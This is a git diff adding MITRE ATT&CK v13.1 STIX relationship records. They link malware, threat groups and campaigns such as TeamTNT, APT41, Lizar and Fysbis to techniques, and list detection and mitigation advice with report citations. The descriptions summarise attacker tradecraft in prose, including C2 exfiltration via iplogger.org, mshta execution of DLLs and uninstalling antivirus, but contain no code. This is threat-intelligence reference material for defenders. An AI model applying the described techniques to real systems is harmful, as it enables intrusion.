b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff3ade9d-2665-4794-bb1e-cb436d790f3f.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--c47e7a32-f4ea-46b5-95bd-76a0ca4649a5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ff3ade9d-2665-4794-bb1e-cb436d790f3f", + "type": "relationship", + "created": "2021-05-26T15:05:36.548Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry CostaRicto November 2020", + "url": "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced", + "description": "The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021." + } + ], + "modified": "2021-05-26T15:39:51.029Z", + "description": "[SombRAT](https://attack.mitre.org/software/S0615) can execute getinfo to enumerate the computer name and OS version of a compromised system.(Citation: BlackBerry CostaRicto November 2020)", + "relationship_type": "uses", + "source_ref": "malware--425771c5-48b4-4ecd-9f95-74ed3fc9da59", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff500c79-fa27-4fe3-a3c2-8c5d20031824.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff500c79-fa27-4fe3-a3c2-8c5d20031824.json new file mode 100644 index 0000000000000000000000000000000000000000..846bc4b885232e73aa5a7fc1a6244b04be88ead7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff500c79-fa27-4fe3-a3c2-8c5d20031824.json 
@@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--dbbdbbf8-1037-4e06-b201-677a2b70d3c7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ff500c79-fa27-4fe3-a3c2-8c5d20031824", + "created": "2021-10-01T01:57:31.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cisco Talos Intelligence Group", + "description": "Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.", + "url": "https://blog.talosintelligence.com/teamtnt-targeting-aws-alibaba-2/" + }, + { + "source_name": "Aqua TeamTNT August 2020", + "description": "Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.", + "url": "https://blog.aquasec.com/container-security-tnt-container-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-12-01T17:31:07.718Z", + "description": "[TeamTNT](https://attack.mitre.org/groups/G0139) has leveraged iplogger.org to send collected data back to C2.(Citation: Aqua TeamTNT August 2020)(Citation: Cisco Talos Intelligence Group)", + "relationship_type": "uses", + "source_ref": "intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca", + "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff7c818b-81a0-48b2-86ea-2f95e2c3ef55.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff7c818b-81a0-48b2-86ea-2f95e2c3ef55.json new file mode 100644 index 0000000000000000000000000000000000000000..58660d1860ed794def476c9fbc72bb163c75d55e 
--- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff7c818b-81a0-48b2-86ea-2f95e2c3ef55.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--27bc214d-3784-47e2-aed0-6d053882ced1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ff7c818b-81a0-48b2-86ea-2f95e2c3ef55", + "type": "relationship", + "created": "2022-03-30T14:26:51.839Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.839Z", + "description": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe. Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro CPL Malware Jan 2014", + "description": "Merc\u00eas, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + } + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9e0633-9618-4616-a303-f9bb059f6289.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9e0633-9618-4616-a303-f9bb059f6289.json new file mode 100644 index 0000000000000000000000000000000000000000..eb17a31d938310736851561b8badd87b85049799 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9e0633-9618-4616-a303-f9bb059f6289.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--16ee55c3-cdd4-4d32-8f60-ea2a9e6e58a7", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ff9e0633-9618-4616-a303-f9bb059f6289", + "type": "relationship", + "created": "2019-09-18T18:09:59.911Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", + "description": "Bryan Lee and Rob Downs. (2016, February 12). A Look Into Fysbis: Sofacy\u2019s Linux Backdoor. Retrieved September 10, 2017.", + "source_name": "Fysbis Palo Alto Analysis" + } + ], + "modified": "2020-03-20T17:22:43.567Z", + "description": "[Fysbis](https://attack.mitre.org/software/S0410) has the ability to create and execute commands in a remote shell for CLI.(Citation: Fysbis Palo Alto Analysis)", + "relationship_type": "uses", + "source_ref": "malware--50d6688b-0985-4f3d-8cbe-0c796b30703b", + "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9e8d81-dc74-4494-a4aa-54f8039f9ad7.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9e8d81-dc74-4494-a4aa-54f8039f9ad7.json new file mode 100644 index 0000000000000000000000000000000000000000..8d28f0b9d91c7dc33ccb87f2c1109a847fba2afe --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9e8d81-dc74-4494-a4aa-54f8039f9ad7.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--e4602cc7-0c3a-476f-ba07-0e8c11d31d2f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ff9e8d81-dc74-4494-a4aa-54f8039f9ad7", + "created": "2022-02-02T21:30:09.805Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "BiZone Lizar May 2021", + "url": "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "description": "BI.ZONE Cyber Threats Research Team. (2021, May 13). From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker\u2019s toolkit. Retrieved February 2, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Lizar](https://attack.mitre.org/software/S0681) has encrypted data before sending it to the server.(Citation: BiZone Lizar May 2021)", + "modified": "2022-04-05T17:31:10.185Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f74a5069-015d-4404-83ad-5ca01056c0dc", + "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9fad0d-7481-4804-a4e8-800265a5c17d.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9fad0d-7481-4804-a4e8-800265a5c17d.json new file mode 100644 index 0000000000000000000000000000000000000000..48e3659b64654a86db24ab251e402057a02dd9b1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9fad0d-7481-4804-a4e8-800265a5c17d.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--57aed8ad-3ac4-40ce-b6ba-fb93a7585ae1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ff9fad0d-7481-4804-a4e8-800265a5c17d", + "created": "2022-09-29T19:05:32.702Z", + "revoked": false, + "external_references": [ + { + "source_name": "DFIR Conti Bazar Nov 2021", + "description": "DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.", + "url": "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T19:05:32.702Z", + "description": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `mshta` to execute DLLs.(Citation: DFIR Conti Bazar Nov 2021)", + "relationship_type": "uses", + "source_ref": "campaign--78068e68-4124-4243-b6f4-76e4e5be8a06", + "target_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffa83fe4-ca25-47b7-9d26-cefed3e32e7f.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffa83fe4-ca25-47b7-9d26-cefed3e32e7f.json new file mode 100644 index 0000000000000000000000000000000000000000..37970edeff87c692de16805a7b94c1b3db8125cc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffa83fe4-ca25-47b7-9d26-cefed3e32e7f.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--9fd2d7aa-dc9d-4524-aaf6-d264f6b7c566", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffa83fe4-ca25-47b7-9d26-cefed3e32e7f", + "type": "relationship", + "created": "2022-03-30T14:26:51.876Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.876Z", + "description": "Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffa8f46b-615f-4b95-8ed5-90f86eaedd20.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffa8f46b-615f-4b95-8ed5-90f86eaedd20.json new file mode 100644 index 0000000000000000000000000000000000000000..068eb01a1372a5b0d17d68a023902b4f5e4ea272 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffa8f46b-615f-4b95-8ed5-90f86eaedd20.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--9c3b4cca-b926-440d-a24d-3d5927123efd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ffa8f46b-615f-4b95-8ed5-90f86eaedd20", + "created": "2019-06-25T12:15:00.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft AMSI June 2015", + "description": "Microsoft. (2015, June 9). Windows 10 to offer application developers new malware defenses. Retrieved February 12, 2018.", + "url": "https://cloudblogs.microsoft.com/microsoftsecure/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/?source=mmpc" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:41:12.796Z", + "description": "Anti-virus can be used to automatically detect and quarantine suspicious files. Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10+ to analyze commands after being processed/interpreted. (Citation: Microsoft AMSI June 2015)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a6a47a06-08fc-4ec4-bdc3-20373375ebb9", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffac75cc-91ec-4ecc-827c-a7090b8951c5.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffac75cc-91ec-4ecc-827c-a7090b8951c5.json new file mode 100644 index 0000000000000000000000000000000000000000..49e3f338c67daf4b8bb63d3b8c975b955f694424 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffac75cc-91ec-4ecc-827c-a7090b8951c5.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--7fd08905-c274-4be5-be7e-80e9ff9b3ce8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffac75cc-91ec-4ecc-827c-a7090b8951c5", + "type": "relationship", + "created": "2022-03-30T14:26:51.870Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.870Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06.json new file mode 100644 index 0000000000000000000000000000000000000000..3e1c118d09e89f1dd2f5b4ad4053f609b1660de4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--ee7013c7-4a63-4ac0-b991-b45039945599", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06", + "type": "relationship", + "created": "2020-12-22T17:48:21.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Crowdstrike GTR2020 Mar 2020", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "description": "Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020." + } + ], + "modified": "2021-04-12T02:29:14.480Z", + "description": "[APT41](https://attack.mitre.org/groups/G0096) has used search order hijacking to execute malicious payloads, such as Winnti RAT.(Citation: Crowdstrike GTR2020 Mar 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7", + "target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffb03265-d9d6-4dc7-ba8e-71498be4e131.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffb03265-d9d6-4dc7-ba8e-71498be4e131.json new file mode 100644 index 0000000000000000000000000000000000000000..c5e875a7e24f6e4c282f914c61e8eb1f87dd00bf --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffb03265-d9d6-4dc7-ba8e-71498be4e131.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--8dd483b1-a7d2-4df9-819c-dd8078ade369", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffb03265-d9d6-4dc7-ba8e-71498be4e131", + "type": "relationship", + "created": "2020-05-26T16:17:59.670Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos Rocke August 2018", + "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html", + "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020." + }, + { + "source_name": "Unit 42 Rocke January 2019", + "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/", + "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020." + } + ], + "modified": "2020-05-26T16:17:59.670Z", + "description": "[Rocke](https://attack.mitre.org/groups/G0106) used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad", + "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffbaf980-7288-4bfd-9887-6b4a103f178c.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffbaf980-7288-4bfd-9887-6b4a103f178c.json new file mode 100644 index 0000000000000000000000000000000000000000..9ee138867a949df6642b4cf45fcd947c90bb4875 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffbaf980-7288-4bfd-9887-6b4a103f178c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--f5c28b7f-a17d-4f30-84ee-d16ea4fcac8a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffbaf980-7288-4bfd-9887-6b4a103f178c", + "type": "relationship", + "created": "2022-03-30T14:26:51.850Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.850Z", + "description": "Monitor executed commands and arguments that may execute their own malicious payloads by hijacking the way operating systems run programs.", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffc0ed92-9331-49c6-bb04-0ed1419c18cb.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffc0ed92-9331-49c6-bb04-0ed1419c18cb.json new file mode 100644 index 0000000000000000000000000000000000000000..516a68cd3a4ca5e0e18728a82c618169896a7870 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffc0ed92-9331-49c6-bb04-0ed1419c18cb.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e3801378-a327-4185-a6e7-70301b6d48e7", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffc0ed92-9331-49c6-bb04-0ed1419c18cb", + "type": "relationship", + "created": "2022-03-30T14:26:51.832Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.832Z", + "description": "Monitor for changes made to AD settings that may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.", + "source_ref": "x-mitre-data-component--5b8b466b-2c81-4fe7-946f-d677a74ae3db", + "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffc74c74-bc06-4f08-96ef-5239341bc2ec.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffc74c74-bc06-4f08-96ef-5239341bc2ec.json new file mode 100644 index 0000000000000000000000000000000000000000..904e7845574b43a92670be9825afc9e80e7ca6fd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffc74c74-bc06-4f08-96ef-5239341bc2ec.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e122be4f-5ed1-4387-b015-caac7cc75be6", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffc74c74-bc06-4f08-96ef-5239341bc2ec", + "type": "relationship", + "created": "2022-03-30T14:26:51.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.854Z", + "description": "Monitor for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffccbf64-ef54-47c7-a117-389b5eca8047.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffccbf64-ef54-47c7-a117-389b5eca8047.json new file mode 100644 index 0000000000000000000000000000000000000000..94b07bc2bdc6ab31e2f39126be21ded228e3d08a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffccbf64-ef54-47c7-a117-389b5eca8047.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--c51b24c0-f31a-4c4a-850f-f709b973cfb6", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ffccbf64-ef54-47c7-a117-389b5eca8047", + "created": "2022-04-14T16:38:09.733Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Periodically baseline instances to identify malicious modifications or additions.", + "modified": "2022-04-14T16:38:09.733Z", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b", + "target_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffcfa61b-2b35-4d06-9298-836fe50f5bed.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffcfa61b-2b35-4d06-9298-836fe50f5bed.json new file mode 100644 index 0000000000000000000000000000000000000000..e8288bce776445b08b7ac1227510d671f481ffe6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffcfa61b-2b35-4d06-9298-836fe50f5bed.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--97f3087c-ee5b-457a-a59f-a7ba7787b674", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffcfa61b-2b35-4d06-9298-836fe50f5bed", + "type": "relationship", + "created": "2022-02-07T16:07:49.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BiZone Lizar May 2021", + "url": "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "description": "BI.ZONE Cyber Threats Research Team. (2021, May 13). From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker\u2019s toolkit. Retrieved February 2, 2022." + } + ], + "modified": "2022-02-07T16:07:49.556Z", + "description": "[Lizar](https://attack.mitre.org/software/S0681) has a plugin to retrieve information about all active network sessions on the infected server.(Citation: BiZone Lizar May 2021)", + "relationship_type": "uses", + "source_ref": "malware--f74a5069-015d-4404-83ad-5ca01056c0dc", + "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffd3ead2-b1a0-46fa-adf0-d13ece7597e8.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffd3ead2-b1a0-46fa-adf0-d13ece7597e8.json new file mode 100644 index 0000000000000000000000000000000000000000..1ee77745403cfee6f5aa7c316e06b97d14caef20 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffd3ead2-b1a0-46fa-adf0-d13ece7597e8.json 
